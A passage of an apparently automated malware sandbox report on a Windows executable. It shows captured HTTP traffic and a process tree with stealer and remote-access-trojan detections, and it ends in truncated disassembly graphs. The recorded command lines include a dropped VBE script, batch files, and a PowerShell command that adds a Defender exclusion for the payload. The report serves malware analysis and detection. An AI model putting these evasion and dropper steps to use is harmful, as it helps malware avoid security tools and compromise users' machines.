                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:55:00.284395933 CET1056OUTData Raw: 5a 5b 5a 59 5c 5b 5f 53 5a 58 51 52 55 57 5a 5e 50 50 5d 5f 59 52 57 42 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: Z[ZY\[_SZXQRUWZ^PP]_YRWB^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.X/*+8 )81X79(T-?$?$#!=Z',5'*-#G $],1
                                                                                                                  Dec 5, 2024 10:55:01.177547932 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:55:01.413055897 CET200INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:55:00 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 4;Y\W0


                                                                                                                  Statistics

                                                                                                                  CPU Usage

                                                                                                                  Click to jump to process

                                                                                                                  Memory Usage

                                                                                                                  Click to jump to process

                                                                                                                  High Level Behavior Distribution

                                                                                                                  Click to dive into process behavior distribution

                                                                                                                  Behavior

                                                                                                                  Click to jump to process

                                                                                                                  System Behavior

                                                                                                                  General

                                                                                                                  Target ID:0
                                                                                                                  Start time:04:52:53
                                                                                                                  Start date:05/12/2024
                                                                                                                  Path:C:\Users\user\Desktop\file.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                  Imagebase:0xe30000
                                                                                                                  File size:2'331'371 bytes
                                                                                                                  MD5 hash:C9059DFB76AD9E011D4E11608CCC98CC
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1644868327.000000000523A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1643679277.00000000068D9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:1
                                                                                                                  Start time:04:52:54
                                                                                                                  Start date:05/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\MsContainer\P69CZ8d7qXWcyOsB66pHSLt72y6yplqEAs.vbe"
                                                                                                                  Imagebase:0xdf0000
                                                                                                                  File size:147'456 bytes
                                                                                                                  MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:2
                                                                                                                  Start time:04:53:05
                                                                                                                  Start date:05/12/2024
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\MsContainer\GHGhSTUsO1Bq4f5yX2eWVB.bat" "
                                                                                                                  Imagebase:0x240000
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:3
                                                                                                                  Start time:04:53:05
                                                                                                                  Start date:05/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:4
                                                                                                                  Start time:04:53:05
                                                                                                                  Start date:05/12/2024
                                                                                                                  Path:C:\MsContainer\chainportruntimeCrtMonitor.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\MsContainer/chainportruntimeCrtMonitor.exe"
                                                                                                                  Imagebase:0x570000
                                                                                                                  File size:2'009'600 bytes
                                                                                                                  MD5 hash:38514F88AFF517EA6BE4724D24B28FE2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000000.1762447136.0000000000572000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1801521334.0000000012BCD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\MsContainer\chainportruntimeCrtMonitor.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\MsContainer\chainportruntimeCrtMonitor.exe, Author: Joe Security
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  • Detection: 58%, ReversingLabs
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:8
                                                                                                                  Start time:04:53:08
                                                                                                                  Start date:05/12/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe'
                                                                                                                  Imagebase:0x800000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:9
                                                                                                                  Start time:04:53:08
                                                                                                                  Start date:05/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:10
                                                                                                                  Start time:04:53:08
                                                                                                                  Start date:05/12/2024
                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\hlVW2PE0oG.bat"
                                                                                                                  Imagebase:0x7ff633620000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:11
                                                                                                                  Start time:04:53:08
                                                                                                                  Start date:05/12/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:12
                                                                                                                  Start time:04:53:08
                                                                                                                  Start date:05/12/2024
                                                                                                                  Path:C:\Windows\System32\chcp.com
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:chcp 65001
                                                                                                                  Imagebase:0x7ff6911d0000
                                                                                                                  File size:14'848 bytes
                                                                                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:13
                                                                                                                  Start time:04:53:09
                                                                                                                  Start date:05/12/2024
                                                                                                                  Path:C:\Windows\System32\PING.EXE
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:ping -n 10 localhost
                                                                                                                  Imagebase:0x7ff70a9a0000
                                                                                                                  File size:22'528 bytes
                                                                                                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:14
                                                                                                                  Start time:04:53:09
                                                                                                                  Start date:05/12/2024
                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  Imagebase:0xf80000
                                                                                                                  File size:2'009'600 bytes
                                                                                                                  MD5 hash:38514F88AFF517EA6BE4724D24B28FE2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000E.00000002.2910935301.0000000003B02000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000E.00000002.2910935301.000000000384A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000E.00000002.2910935301.0000000003529000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe, Author: Joe Security
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  • Detection: 58%, ReversingLabs
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:15
                                                                                                                  Start time:04:53:10
                                                                                                                  Start date:05/12/2024
                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  Imagebase:0x960000
                                                                                                                  File size:2'009'600 bytes
                                                                                                                  MD5 hash:38514F88AFF517EA6BE4724D24B28FE2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:17
                                                                                                                  Start time:04:53:11
                                                                                                                  Start date:05/12/2024
                                                                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                  Imagebase:0x7ff693ab0000
                                                                                                                  File size:496'640 bytes
                                                                                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:18
                                                                                                                  Start time:04:53:17
                                                                                                                  Start date:05/12/2024
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                  Imagebase:0x7ff6eef20000
                                                                                                                  File size:55'320 bytes
                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:19
                                                                                                                  Start time:04:53:18
                                                                                                                  Start date:05/12/2024
                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe"
                                                                                                                  Imagebase:0x3e0000
                                                                                                                  File size:2'009'600 bytes
                                                                                                                  MD5 hash:38514F88AFF517EA6BE4724D24B28FE2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Has exited:true

                                                                                                                  Disassembly

                                                                                                                  Reset < >

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:9.6%
                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                    Signature Coverage:9.2%
                                                                                                                    Total number of Nodes:1510
                                                                                                                    Total number of Limit Nodes:44
                                                                                                                    execution_graph 23332 e313e1 84 API calls 2 library calls 23333 e4eae7 23334 e4eaf1 23333->23334 23337 e4e85d 23334->23337 23363 e4e5bb 23337->23363 23339 e4e86d 23340 e4e8ca 23339->23340 23344 e4e8ee 23339->23344 23341 e4e7fb DloadReleaseSectionWriteAccess 6 API calls 23340->23341 23342 e4e8d5 RaiseException 23341->23342 23358 e4eac3 23342->23358 23343 e4e966 LoadLibraryExA 23345 e4e9c7 23343->23345 23346 e4e979 GetLastError 23343->23346 23344->23343 23344->23345 23347 e4ea95 23344->23347 23349 e4e9d9 23344->23349 23348 e4e9d2 FreeLibrary 23345->23348 23345->23349 23350 e4e9a2 23346->23350 23357 e4e98c 23346->23357 23372 e4e7fb 23347->23372 23348->23349 23349->23347 23351 e4ea37 GetProcAddress 23349->23351 23352 e4e7fb DloadReleaseSectionWriteAccess 6 API calls 23350->23352 23351->23347 23353 e4ea47 GetLastError 23351->23353 23354 e4e9ad RaiseException 23352->23354 23355 e4ea5a 23353->23355 23354->23358 23355->23347 23359 e4e7fb DloadReleaseSectionWriteAccess 6 API calls 23355->23359 23357->23345 23357->23350 23360 e4ea7b RaiseException 23359->23360 23361 e4e5bb ___delayLoadHelper2@8 6 API calls 23360->23361 23362 e4ea92 23361->23362 23362->23347 23364 e4e5c7 23363->23364 23365 e4e5ed 23363->23365 23380 e4e664 23364->23380 23365->23339 23367 e4e5cc 23368 e4e5e8 23367->23368 23383 e4e78d 23367->23383 23388 e4e5ee GetModuleHandleW GetProcAddress GetProcAddress 23368->23388 23371 e4e836 23371->23339 23373 e4e80d 23372->23373 23374 e4e82f 23372->23374 23375 e4e664 DloadReleaseSectionWriteAccess 3 API calls 23373->23375 23374->23358 23376 e4e812 23375->23376 23377 e4e82a 23376->23377 23378 e4e78d DloadProtectSection 3 API calls 23376->23378 23391 e4e831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 23377->23391 23378->23377 23389 e4e5ee GetModuleHandleW GetProcAddress GetProcAddress 23380->23389 23382 e4e669 23382->23367 23384 e4e7a2 DloadProtectSection 23383->23384 23385 e4e7a8 23384->23385 23386 e4e7dd VirtualProtect 23384->23386 23390 e4e6a3 VirtualQuery GetSystemInfo 23384->23390 23385->23368 23386->23385 23388->23371 23389->23382 23390->23386 23391->23374 25271 e4f4e7 29 API calls _abort 23392 e4b7e0 23393 e4b7ea __EH_prolog 23392->23393 23558 e31316 23393->23558 23396 e4bf0f 23637 e4d69e 23396->23637 23397 e4b82a 23399 e4b838 23397->23399 23400 e4b89b 23397->23400 23470 e4b841 23397->23470 23402 e4b83c 23399->23402 23403 e4b878 23399->23403 23406 e4b92e GetDlgItemTextW 23400->23406 23410 e4b8b1 23400->23410 23412 e3e617 53 API calls 23402->23412 23402->23470 23414 e4b95f KiUserCallbackDispatcher 23403->23414 23403->23470 23404 e4bf38 23407 e4bf41 SendDlgItemMessageW 23404->23407 23408 e4bf52 GetDlgItem SendMessageW 23404->23408 23405 e4bf2a SendMessageW 23405->23404 23406->23403 23409 e4b96b 23406->23409 23407->23408 23655 e4a64d GetCurrentDirectoryW 23408->23655 23415 e4b980 GetDlgItem 23409->23415 23556 e4b974 23409->23556 23411 e3e617 53 API calls 23410->23411 23418 e4b8ce SetDlgItemTextW 23411->23418 23419 e4b85b 23412->23419 23414->23470 23416 e4b994 SendMessageW SendMessageW 23415->23416 23417 e4b9b7 SetFocus 23415->23417 23416->23417 23421 e4b9c7 23417->23421 23436 e4b9e0 23417->23436 23422 e4b8d9 23418->23422 23677 e3124f SHGetMalloc 23419->23677 23420 e4bf82 GetDlgItem 23424 e4bfa5 SetWindowTextW 23420->23424 23425 e4bf9f 23420->23425 23426 e3e617 53 API calls 23421->23426 23429 e4b8e6 GetMessageW 23422->23429 23422->23470 23656 e4abab GetClassNameW 23424->23656 23425->23424 23430 e4b9d1 23426->23430 23427 e4be55 23431 e3e617 53 API calls 23427->23431 23434 e4b8fd IsDialogMessageW 23429->23434 23429->23470 23678 e4d4d4 23430->23678 23438 e4be65 SetDlgItemTextW 23431->23438 23434->23422 23440 e4b90c TranslateMessage DispatchMessageW 23434->23440 23442 e3e617 53 API calls 23436->23442 23437 e4c1fc SetDlgItemTextW 23437->23470 23441 e4be79 23438->23441 23440->23422 23443 e3e617 53 API calls 23441->23443 23445 e4ba17 23442->23445 23481 e4be9c _wcslen 23443->23481 23444 e4bff0 23449 e4c020 23444->23449 23452 e3e617 53 API calls 23444->23452 23450 e34092 _swprintf 51 API calls 23445->23450 23446 e4b9d9 23568 e3a0b1 23446->23568 23448 e4c73f 97 API calls 23448->23444 23459 e4c73f 97 API calls 23449->23459 23504 e4c0d8 23449->23504 23453 e4ba29 23450->23453 23458 e4c003 SetDlgItemTextW 23452->23458 23454 e4d4d4 16 API calls 23453->23454 23454->23446 23455 e4c18b 23460 e4c194 EnableWindow 23455->23460 23461 e4c19d 23455->23461 23456 e4ba68 GetLastError 23457 e4ba73 23456->23457 23574 e4ac04 SetCurrentDirectoryW 23457->23574 23463 e3e617 53 API calls 23458->23463 23465 e4c03b 23459->23465 23460->23461 23466 e4c1ba 23461->23466 23696 e312d3 GetDlgItem EnableWindow 23461->23696 23462 e4beed 23469 e3e617 53 API calls 23462->23469 23467 e4c017 SetDlgItemTextW 23463->23467 23471 e4c04d 23465->23471 23501 e4c072 23465->23501 23474 e4c1e1 23466->23474 23484 e4c1d9 SendMessageW 23466->23484 23467->23449 23468 e4ba87 23475 e4ba90 GetLastError 23468->23475 23476 e4ba9e 23468->23476 23469->23470 23694 e49ed5 32 API calls 23471->23694 23472 e4c0cb 23477 e4c73f 97 API calls 23472->23477 23474->23470 23487 e3e617 53 API calls 23474->23487 23475->23476 23478 e4bb11 23476->23478 23485 e4baae GetTickCount 23476->23485 23486 e4bb20 23476->23486 23477->23504 23478->23486 23489 e4bd56 23478->23489 23480 e4c1b0 23697 e312d3 GetDlgItem EnableWindow 23480->23697 23481->23462 23488 e3e617 53 API calls 23481->23488 23482 e4c066 23482->23501 23484->23474 23575 e34092 23485->23575 23490 e4bcf1 23486->23490 23491 e4bb39 GetModuleFileNameW 23486->23491 23497 e4bcfb 23486->23497 23495 e4b862 23487->23495 23496 e4bed0 23488->23496 23593 e312f1 GetDlgItem ShowWindow 23489->23593 23490->23403 23490->23497 23688 e3f28c 82 API calls 23491->23688 23492 e4c169 23695 e49ed5 32 API calls 23492->23695 23495->23437 23495->23470 23505 e34092 _swprintf 51 API calls 23496->23505 23500 e3e617 53 API calls 23497->23500 23508 e4bd05 23500->23508 23501->23472 23509 e4c73f 97 API calls 23501->23509 23502 e4bd66 23594 e312f1 GetDlgItem ShowWindow 23502->23594 23503 e4bac7 23578 e3966e 23503->23578 23504->23455 23504->23492 23511 e3e617 53 API calls 23504->23511 23505->23462 23506 e4bb5f 23512 e34092 _swprintf 51 API calls 23506->23512 23507 e4c188 23507->23455 23513 e34092 _swprintf 51 API calls 23508->23513 23514 e4c0a0 23509->23514 23511->23504 23516 e4bb81 CreateFileMappingW 23512->23516 23517 e4bd23 23513->23517 23514->23472 23518 e4c0a9 DialogBoxParamW 23514->23518 23515 e4bd70 23595 e3e617 23515->23595 23521 e4bbe3 GetCommandLineW 23516->23521 23551 e4bc60 __InternalCxxFrameHandler 23516->23551 23529 e3e617 53 API calls 23517->23529 23518->23403 23518->23472 23524 e4bbf4 23521->23524 23523 e4baed 23526 e4baf4 GetLastError 23523->23526 23527 e4baff 23523->23527 23689 e4b425 SHGetMalloc 23524->23689 23526->23527 23586 e3959a 23527->23586 23536 e4bd3d 23529->23536 23530 e4bd8c SetDlgItemTextW GetDlgItem 23533 e4bdc1 23530->23533 23534 e4bda9 GetWindowLongW SetWindowLongW 23530->23534 23532 e4bc10 23690 e4b425 SHGetMalloc 23532->23690 23600 e4c73f 23533->23600 23534->23533 23538 e4bc1c 23691 e4b425 SHGetMalloc 23538->23691 23541 e4c73f 97 API calls 23543 e4bddd 23541->23543 23542 e4bc28 23692 e3f3fa 82 API calls 2 library calls 23542->23692 23625 e4da52 23543->23625 23545 e4bccb 23545->23490 23550 e4bce1 UnmapViewOfFile CloseHandle 23545->23550 23548 e4bc3f MapViewOfFile 23548->23551 23549 e4c73f 97 API calls 23555 e4be03 23549->23555 23550->23490 23551->23545 23553 e4bcb7 Sleep 23551->23553 23552 e4be2c 23693 e312d3 GetDlgItem EnableWindow 23552->23693 23553->23545 23553->23551 23555->23552 23557 e4c73f 97 API calls 23555->23557 23556->23403 23556->23427 23557->23552 23559 e31378 23558->23559 23560 e3131f 23558->23560 23699 e3e2c1 GetWindowLongW SetWindowLongW 23559->23699 23561 e31385 23560->23561 23698 e3e2e8 62 API calls 2 library calls 23560->23698 23561->23396 23561->23397 23561->23470 23564 e31341 23564->23561 23565 e31354 GetDlgItem 23564->23565 23565->23561 23566 e31364 23565->23566 23566->23561 23567 e3136a SetWindowTextW 23566->23567 23567->23561 23569 e3a0bb 23568->23569 23570 e3a175 23569->23570 23571 e3a14c 23569->23571 23700 e3a2b2 23569->23700 23570->23456 23570->23457 23571->23570 23572 e3a2b2 8 API calls 23571->23572 23572->23570 23574->23468 23738 e34065 23575->23738 23579 e39678 23578->23579 23580 e396d5 CreateFileW 23579->23580 23581 e396c9 23579->23581 23580->23581 23582 e3bb03 GetCurrentDirectoryW 23581->23582 23583 e3971f 23581->23583 23584 e39704 23582->23584 23583->23523 23584->23583 23585 e39708 CreateFileW 23584->23585 23585->23583 23587 e395cf 23586->23587 23588 e395be 23586->23588 23587->23478 23588->23587 23589 e395d1 23588->23589 23590 e395ca 23588->23590 23830 e39620 23589->23830 23825 e3974e 23590->23825 23593->23502 23594->23515 23596 e3e627 23595->23596 23845 e3e648 23596->23845 23599 e312f1 GetDlgItem ShowWindow 23599->23530 23601 e4c749 __EH_prolog 23600->23601 23608 e4bdcf 23601->23608 23868 e4b314 23601->23868 23603 e4c780 _wcslen _wcsrchr 23605 e4b314 ExpandEnvironmentStringsW 23603->23605 23606 e4ca67 SetWindowTextW 23603->23606 23603->23608 23612 e4c855 SetFileAttributesW 23603->23612 23617 e4cc31 GetDlgItem SetWindowTextW SendMessageW 23603->23617 23620 e4cc71 SendMessageW 23603->23620 23872 e41fbb CompareStringW 23603->23872 23873 e4a64d GetCurrentDirectoryW 23603->23873 23875 e3a5d1 6 API calls 23603->23875 23876 e3a55a FindClose 23603->23876 23877 e4b48e 76 API calls 2 library calls 23603->23877 23878 e53e3e 23603->23878 23605->23603 23606->23603 23608->23541 23613 e4c90f GetFileAttributesW 23612->23613 23624 e4c86f __cftof _wcslen 23612->23624 23613->23603 23616 e4c921 DeleteFileW 23613->23616 23616->23603 23618 e4c932 23616->23618 23617->23603 23619 e34092 _swprintf 51 API calls 23618->23619 23621 e4c952 GetFileAttributesW 23619->23621 23620->23603 23621->23618 23622 e4c967 MoveFileW 23621->23622 23622->23603 23623 e4c97f MoveFileExW 23622->23623 23623->23603 23624->23603 23624->23613 23874 e3b991 51 API calls 3 library calls 23624->23874 23626 e4da5c __EH_prolog 23625->23626 23902 e40659 23626->23902 23628 e4da8d 23906 e35b3d 23628->23906 23630 e4daab 23910 e37b0d 23630->23910 23634 e4dafe 23926 e37b9e 23634->23926 23636 e4bdee 23636->23549 23638 e4d6a8 23637->23638 24434 e4a5c6 23638->24434 23641 e4d6b5 GetWindow 23642 e4bf15 23641->23642 23648 e4d6d5 23641->23648 23642->23404 23642->23405 23643 e4d6e2 GetClassNameW 24439 e41fbb CompareStringW 23643->24439 23645 e4d706 GetWindowLongW 23646 e4d76a GetWindow 23645->23646 23647 e4d716 SendMessageW 23645->23647 23646->23642 23646->23648 23647->23646 23649 e4d72c GetObjectW 23647->23649 23648->23642 23648->23643 23648->23645 23648->23646 24440 e4a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23649->24440 23651 e4d743 24441 e4a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23651->24441 24442 e4a80c 8 API calls 23651->24442 23654 e4d754 SendMessageW DeleteObject 23654->23646 23655->23420 23657 e4abf1 23656->23657 23658 e4abcc 23656->23658 23660 e4abf6 SHAutoComplete 23657->23660 23661 e4abff 23657->23661 24445 e41fbb CompareStringW 23658->24445 23660->23661 23664 e4b093 23661->23664 23662 e4abdf 23662->23657 23663 e4abe3 FindWindowExW 23662->23663 23663->23657 23665 e4b09d __EH_prolog 23664->23665 23666 e313dc 84 API calls 23665->23666 23667 e4b0bf 23666->23667 24446 e31fdc 23667->24446 23670 e4b0d9 23672 e31692 86 API calls 23670->23672 23671 e4b0eb 23673 e319af 128 API calls 23671->23673 23674 e4b0e4 23672->23674 23676 e4b10d __InternalCxxFrameHandler ___std_exception_copy 23673->23676 23674->23444 23674->23448 23675 e31692 86 API calls 23675->23674 23676->23675 23677->23495 24454 e4b568 PeekMessageW 23678->24454 23681 e4d536 SendMessageW SendMessageW 23683 e4d591 SendMessageW SendMessageW SendMessageW 23681->23683 23684 e4d572 23681->23684 23682 e4d502 23685 e4d50d ShowWindow SendMessageW SendMessageW 23682->23685 23686 e4d5c4 SendMessageW 23683->23686 23687 e4d5e7 SendMessageW 23683->23687 23684->23683 23685->23681 23686->23687 23687->23446 23688->23506 23689->23532 23690->23538 23691->23542 23692->23548 23693->23556 23694->23482 23695->23507 23696->23480 23697->23466 23698->23564 23699->23561 23701 e3a2bf 23700->23701 23702 e3a2e3 23701->23702 23704 e3a2d6 CreateDirectoryW 23701->23704 23721 e3a231 23702->23721 23704->23702 23705 e3a316 23704->23705 23708 e3a325 23705->23708 23713 e3a4ed 23705->23713 23707 e3a329 GetLastError 23707->23708 23708->23569 23711 e3a2ff 23711->23707 23712 e3a303 CreateDirectoryW 23711->23712 23712->23705 23712->23707 23728 e4ec50 23713->23728 23716 e3a510 23718 e3bb03 GetCurrentDirectoryW 23716->23718 23717 e3a53d 23717->23708 23719 e3a524 23718->23719 23719->23717 23720 e3a528 SetFileAttributesW 23719->23720 23720->23717 23730 e3a243 23721->23730 23724 e3bb03 23725 e3bb10 _wcslen 23724->23725 23726 e3bbb8 GetCurrentDirectoryW 23725->23726 23727 e3bb39 _wcslen 23725->23727 23726->23727 23727->23711 23729 e3a4fa SetFileAttributesW 23728->23729 23729->23716 23729->23717 23731 e4ec50 23730->23731 23732 e3a250 